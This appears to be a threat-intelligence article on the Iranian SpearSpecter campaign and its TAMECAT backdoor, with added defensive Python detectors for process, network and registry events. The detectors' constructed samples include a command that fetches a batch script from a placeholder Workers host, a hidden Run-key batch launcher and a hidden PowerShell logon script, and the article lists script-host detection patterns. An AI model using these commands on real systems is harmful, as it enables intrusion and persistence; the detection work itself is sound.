Researchers from the Israel National Digital Agency (INDA) have revealed a highly sophisticated, ongoing cyber-espionage operation they call SpearSpecter, linked to Iranian state-aligned threat actors working on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO). The campaign leverages weeks-long social engineering, multi-channel command-and-control (C2) frameworks, and the fileless TAMECAT PowerShell backdoor to infiltrate high-value government and defense targets.
Unlike common phishing operations, SpearSpecter relies on slow, carefully cultivated engagement with targeted individuals. Operators impersonate scholars, diplomats, conference organizers, or senior officials and spend days or weeks messaging the target—often through WhatsApp—to build legitimacy before introducing malicious elements.
As the report explains:
“SpearSpecter elevates spear-phishing by devoting weeks to building personalized relationships with high-value targets… They sustain multi-day conversations to build credibility.”
Targets include senior figures in defense ministries, intelligence sectors, and high-level government offices, as well as their family members—a tactic designed to widen the attack surface and apply pressure.

Once trust is established, victims receive malicious links disguised as conference documents or briefing materials hosted on OneDrive. Clicking the link triggers several hidden redirects that abuse the Windows search-ms URI protocol, prompting users to open Windows Explorer.
The report notes:
“One redirect leads to a crafted web page that abuses the Windows search-ms URI protocol handler… Explorer connects to the attacker’s WebDAV server.”
From that WebDAV share, the victim is shown a malicious LNK file disguised as a PDF. When opened, the LNK silently executes a command that downloads a batch script from Cloudflare Workers, initiating the infection chain.
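Detection logic for the initial-access chain just described, added here as an example and not taken from the INDA report: it walks constructed process-creation events (field names mimic Sysmon Event ID 1) and flags Explorer launched with a search-ms: URI, a WebDAV (DavWWWRoot) path on a command line, and a shell spawned by Explorer that fetches a .bat from Cloudflare Workers. The *.workers.dev hostname is Cloudflare's default Workers domain and is an assumption, since the article names only the service; every PID, hostname and command line is constructed.

```python
"""
Added example, not code from the INDA report: flag the initial-access chain
described above (search-ms: URI -> WebDAV share -> LNK-launched shell fetching a
batch script from Cloudflare Workers) in process-creation events. Field names
mimic Sysmon Event ID 1; every PID, host and command line below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name only, lower-case, e.g. "explorer.exe"
    cmdline: str    # full command line


# Explorer is the registered handler for search-ms: URIs, so the URI appears on
# its command line when a web page triggers the handler.
SEARCH_MS = re.compile(r"\bsearch-ms:", re.I)
# UNC path served through the WebClient (WebDAV) redirector, e.g. \\host@SSL\DavWWWRoot\...
WEBDAV_PATH = re.compile(r"\\\\[\w.-]+(?:@ssl)?(?:@\d+)?\\davwwwroot", re.I)
# Download of a .bat from *.workers.dev, Cloudflare's default Workers domain.
# Assumption: the article says only "Cloudflare Workers"; a Worker behind a
# custom domain would not match this string, which is why the parent-process
# condition below is the more durable signal.
BAT_FETCH = re.compile(r"https?://[\w.-]*workers\.dev/[^\s'\"]*\.bat\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def detect(events: List[ProcEvent]) -> Dict[str, List[int]]:
    """Return rule name -> PIDs of events matching that rule."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[str, List[int]] = {"search_ms": [], "webdav": [], "lnk_downloader": []}
    for e in events:
        if e.image == "explorer.exe" and SEARCH_MS.search(e.cmdline):
            hits["search_ms"].append(e.pid)
        if WEBDAV_PATH.search(e.cmdline):
            hits["webdav"].append(e.pid)
        parent = by_pid.get(e.ppid)
        if (e.image in SHELLS and parent is not None
                and parent.image == "explorer.exe" and BAT_FETCH.search(e.cmdline)):
            hits["lnk_downloader"].append(e.pid)
    return hits


def chain_severity(events: List[ProcEvent]) -> str:
    """'high' when a shell spawned by Explorer fetches a .bat and that Explorer
    instance was itself started via search-ms or touched a WebDAV path;
    'medium' for any single indicator; 'none' otherwise."""
    hits = detect(events)
    by_pid = {e.pid: e for e in events}
    for pid in hits["lnk_downloader"]:
        ppid = by_pid[pid].ppid
        if ppid in hits["search_ms"] or ppid in hits["webdav"]:
            return "high"
    return "medium" if any(hits.values()) else "none"


# Constructed sample: a normal desktop Explorer, a browser, then the suspicious chain.
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "msedge.exe",
              "\"C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe\" https://onedrive.live.com/"),
    ProcEvent(300, 200, "explorer.exe",
              "C:\\Windows\\explorer.exe \"search-ms:query=Briefing&crumb=location:"
              "\\\\webdav.example@SSL\\DavWWWRoot\\docs\""),
    ProcEvent(400, 300, "cmd.exe",
              "cmd.exe /c curl -s https://placeholder.workers.dev/stage1.bat -o %TEMP%\\stage1.bat"),
]

if __name__ == "__main__":
    for rule, pids in detect(SAMPLE).items():
        print(f"{rule:15s} -> {pids}")
    print("severity:", chain_severity(SAMPLE))
```

The per-rule hits are kept separate so a single indicator (an Explorer search that happens to use a WebDAV location) stays at medium, while the parent-child link from a search-ms-launched Explorer to a downloading shell is what earns the high rating.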
After the initial compromise, the malware deploys TAMECAT, a modular PowerShell-based backdoor previously observed in APT42-related operations.
INDA describes it as:
“a sophisticated PowerShell-based backdoor known as TAMECAT… with modular components designed to facilitate data exfiltration and remote control.”
Key TAMECAT capabilities include:
- In-memory execution with minimal disk artifacts
- Dynamic module loading via Cloudflare Workers
- Multi-channel C2: HTTPS, Discord, and Telegram
- Credential harvesting (browsers, VPNs, crypto wallets)
- Data exfiltration using AES-encrypted channels
- Screenshot capture (50 images per session)
- Outlook OST mailbox theft
- Targeted file crawling across sensitive document types
INDA emphasizes the novelty of the C2 design:
“The SpearSpecter campaign was the first recorded instance of APT42 using Telegram and Discord as C2.”
The Telegram-based command handler even treats any unknown incoming message as executable PowerShell, allowing operators to run code on the target system with a single chat message.
Throughout the operation, SpearSpecter relies heavily on legitimate cloud infrastructure, including Cloudflare Workers, Discord, Telegram, Firebase, and Somee WebDAV hosting.
INDA notes:
“TAMECAT leverages Cloudflare Workers… Traffic to Cloudflare blends seamlessly with normal web browsing and is widely permitted.”
This ensures both resiliency and low detectability, making the malware’s network traffic difficult for defenders to block without risking service disruption.
TAMECAT’s data harvesting is highly selective, focusing on high-value files such as:
- Office documents
- PDFs and spreadsheets
- Password databases
- Media files
- Browser profiles
- Outlook mailboxes
It avoids noisy or irrelevant directories to minimize detection.
A unique component, Runs.dll, enables chunked uploads:
“Reads a byte-range from a file and returns that slice… so the file can be streamed piece by piece without loading the file into memory.”
This allows large archives or mailbox files to be exfiltrated quietly over encrypted HTTPS, Telegram, or FTP channels.
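An added example (not code from the INDA report) serving two of the points above: the observation that traffic to Cloudflare, Telegram and Discord cannot simply be blocked, and the chunked byte-range uploads attributed to Runs.dll. It runs two checks over constructed network-connection events whose fields mimic Sysmon Event ID 3 plus a byte count: a process-aware egress rule that asks which process is talking to those services, and a rule that spots a burst of equal-sized uploads from one process to one host, the traffic shape a byte-range streamer produces. The hostnames are the services' public endpoints (api.telegram.org, discord.com, *.workers.dev, firebaseio.com); the process allow-list, thresholds and all events are assumptions made for the example.

```python
"""
Added example, not code from the INDA report. Two checks over constructed
network-connection events (fields mimic Sysmon Event ID 3 plus a byte count):
(1) a process-aware egress rule, since the described services cannot simply be
blocked; (2) a burst-of-equal-sized-uploads rule, the shape a byte-range
streamer such as the described Runs.dll produces. Every event is made up.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class NetEvent:
    ts: float        # seconds since start of capture
    pid: int
    image: str       # initiating process image name, lower-case
    parent: str      # parent image name (the described logon script runs PowerShell under conhost.exe)
    dest_host: str   # destination hostname, e.g. from DNS or TLS SNI
    bytes_out: int   # payload bytes sent on this connection


# Services the article names as C2 or staging, keyed by hostname suffix.
SERVICE_SUFFIXES = {
    "telegram": ("api.telegram.org",),
    "discord": ("discord.com", "discordapp.com"),
    "cloudflare_workers": ("workers.dev",),
    "firebase": ("firebaseio.com", "firebaseapp.com"),
}
# Processes for which traffic to these services is normal here (site-specific assumption).
EXPECTED = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe", "telegram.exe"}
# Script and LOLBin hosts that have no business reaching a chat API.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def classify(host: str) -> Optional[str]:
    """Map a hostname to a service category, or None if it is not one we watch."""
    h = host.lower().rstrip(".")
    for name, suffixes in SERVICE_SUFFIXES.items():
        if any(h == s or h.endswith("." + s) for s in suffixes):
            return name
    return None


def score(e: NetEvent) -> int:
    """0 expected, 1 unusual process, 2 script host, 3 script host parented by conhost.exe."""
    if classify(e.dest_host) is None or e.image in EXPECTED:
        return 0
    if e.image not in SCRIPT_HOSTS:
        return 1
    return 3 if e.parent == "conhost.exe" else 2


def triage(events: List[NetEvent]) -> List[Tuple[int, int, str, str]]:
    """Unique (score, pid, image, service) for flagged events, highest score first."""
    flagged = {(score(e), e.pid, e.image, classify(e.dest_host) or "") for e in events}
    return sorted((f for f in flagged if f[0] > 0), key=lambda f: (-f[0], f[1]))


def chunked_upload_bursts(events: List[NetEvent], min_chunks: int = 5,
                          window_s: float = 120.0) -> List[Tuple[int, str, int, int]]:
    """(pid, dest_host, chunk_size, count) where one process sent at least
    min_chunks uploads of identical size to one host within window_s seconds."""
    stamps: Dict[Tuple[int, str, int], List[float]] = defaultdict(list)
    for e in events:
        if e.bytes_out > 0:
            stamps[(e.pid, e.dest_host, e.bytes_out)].append(e.ts)
    bursts = []
    for (pid, host, size), times in stamps.items():
        times.sort()
        best, j = 0, 0
        for i, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[j] > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best >= min_chunks:
            bursts.append((pid, host, size, best))
    return bursts


# Constructed capture: a browser session, an odd helper binary, one script host
# on Workers, and a conhost-parented PowerShell streaming six 1 MiB chunks to Telegram.
CHUNK = 1_048_576
SAMPLE = [
    NetEvent(0.0, 1200, "msedge.exe", "explorer.exe", "discord.com", 2048),
    NetEvent(1.0, 1300, "sync-helper.exe", "explorer.exe", "demo-project.firebaseio.com", 512),
    NetEvent(2.0, 1400, "powershell.exe", "explorer.exe", "placeholder.workers.dev", 300),
    NetEvent(3.0, 1600, "powershell.exe", "conhost.exe", "www.example.com", 100),  # not a watched service
] + [NetEvent(10.0 * i, 1500, "powershell.exe", "conhost.exe", "api.telegram.org", CHUNK)
     for i in range(6)]

if __name__ == "__main__":
    for s, pid, image, svc in triage(SAMPLE):
        print(f"score={s} pid={pid} {image} -> {svc}")
    for pid, host, size, n in chunked_upload_bursts(SAMPLE):
        print(f"pid={pid} sent {n} chunks of {size} bytes to {host}")
```

The egress rule deliberately scores on the initiating process rather than the destination, so browsers and the official chat clients keep working while a script host reaching the same endpoints is surfaced; the burst rule needs no destination list at all, which makes it useful for the HTTPS and FTP channels the report also mentions.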
SpearSpecter uses redundant persistence techniques, including:
- A Run key named Renovation to execute hidden batch files
- A UserInitMprLogonScript entry invoking conhost-hosted PowerShell beacons
- Storing victim identifiers in the registry rather than on disk
- Obfuscated, randomly named files (e.g., fhgPczTORoCNEDsm.txt)
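An offline audit for the persistence entries listed above, added here as an example and not code from the INDA report: a minimal parser for Windows registry export (.reg) text followed by checks for a Run value that launches a batch file with a hidden window, the Run value name Renovation, a UserInitMprLogonScript value under HKCU\Environment that starts PowerShell via conhost.exe, and references to long randomly cased file names. Only the value name Renovation, the UserInitMprLogonScript technique and the file name fhgPczTORoCNEDsm.txt come from the article; the .reg content, user name, paths and commands are constructed, and the PowerShell argument is an explicit placeholder.

```python
"""
Added example, not code from the INDA report: parse a Windows .reg export and
flag the persistence the article lists. The .reg text is constructed; only the
value name "Renovation", the UserInitMprLogonScript technique and the file name
fhgPczTORoCNEDsm.txt come from the article.
"""
import re
from typing import Dict, List, Tuple

RUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
)
LOGON_SCRIPT_KEY = r"hkey_current_user\environment"
# "name"="data" or @="data"; .reg escapes backslash as \\ and quote as \"
VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)="((?:[^"\\]|\\.)*)"$')
BATCH = re.compile(r"\.(?:bat|cmd)\b", re.I)
HIDDEN = re.compile(r"/min\b|\bstart\s+/b\b|-w(?:indowstyle)?\s+hidden", re.I)
# a long, mixed-case, letters-only file name such as fhgPczTORoCNEDsm.txt
RANDOM_NAME = re.compile(r"[\\/]([A-Za-z]{12,})\.(?:txt|bat|cmd|dat)\b")


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: key path -> {value name: string data}.
    Only string values are kept; dword and hex blobs are skipped."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "(Default)"
            keys[current][name] = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
    return keys


def audit(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """Return (severity, key, value name, reason) for each suspicious entry."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        is_run = any(k.endswith(rk) for rk in RUN_KEYS)
        is_env = k == LOGON_SCRIPT_KEY
        if not (is_run or is_env):
            continue
        for name, cmd in values.items():
            if is_run and BATCH.search(cmd) and HIDDEN.search(cmd):
                findings.append(("high", key, name, "Run value launches a batch file with a hidden window"))
            if is_run and name.lower() == "renovation":
                findings.append(("high", key, name, "Run value name reported for SpearSpecter"))
            if is_env and name.lower() == "userinitmprlogonscript":
                sev = "high" if re.search(r"conhost\.exe|powershell", cmd, re.I) else "medium"
                findings.append((sev, key, name, "UserInitMprLogonScript set: script runs at every logon"))
            m = RANDOM_NAME.search(cmd)
            if m and m.group(1) != m.group(1).lower() and m.group(1) != m.group(1).upper():
                findings.append(("medium", key, name, f"references randomly named file {m.group(0)[1:]}"))
    return findings


# Constructed export: one legitimate Run value, the Renovation value, a normal
# TEMP variable and a conhost-hosted PowerShell logon script (argument is a placeholder).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Renovation"="cmd.exe /c start /min \"\" \"%APPDATA%\\Renovation\\launch.bat\""

[HKEY_CURRENT_USER\Environment]
"TEMP"="%USERPROFILE%\\AppData\\Local\\Temp"
"UserInitMprLogonScript"="conhost.exe --headless powershell.exe -nop -w hidden -c \"<placeholder: loads %APPDATA%\\fhgPczTORoCNEDsm.txt>\""
'''

if __name__ == "__main__":
    for sev, key, name, reason in audit(parse_reg(SAMPLE_REG)):
        print(f"[{sev}] {key} \\ {name}: {reason}")
```

UserInitMprLogonScript is rarely set on a workstation at all, so its mere presence is worth a ticket; the conhost/PowerShell check only raises the severity. Run the same audit against `reg export` output from HKLM as well as each user hive, since the Run key exists in both.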
The report states:
“TAMECAT operates as a modular in-memory loader that uses trusted system binaries… to minimize on-disk traces.”
INDA assesses with high confidence that the campaign is operated by IRGC-IO-aligned groups, including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.
According to the researchers:
“Our investigation identified tools, infrastructure components, and operational patterns… strongly aligned with activity historically attributed to Iranian state-aligned actors within the IRGC’s cyber apparatus.”
These include:
- APT42-style WhatsApp social engineering
- LNK-based initial access, with runtime-repaired commands
- Use of TAMECAT and NICECURL-like loaders
- Cloud-hosted fake meeting invitations
- Multi-cluster infrastructure strategy
The operators also target senior defense and government officials, consistent with IRGC intelligence objectives.
SpearSpecter represents a significant escalation in Iranian cyber-espionage tradecraft. With its focus on relationship-based social engineering, fileless modular malware, and multi-channel, cloud-based C2, the campaign demonstrates persistence, discipline, and a deep understanding of both human behavior and Windows internals.
As the report summarizes:
“The strategic focus on senior leadership, combined with these tailored delivery methods and custom tooling, exemplifies the patient, intelligence-first operations characteristic of state-sponsored APT groups.”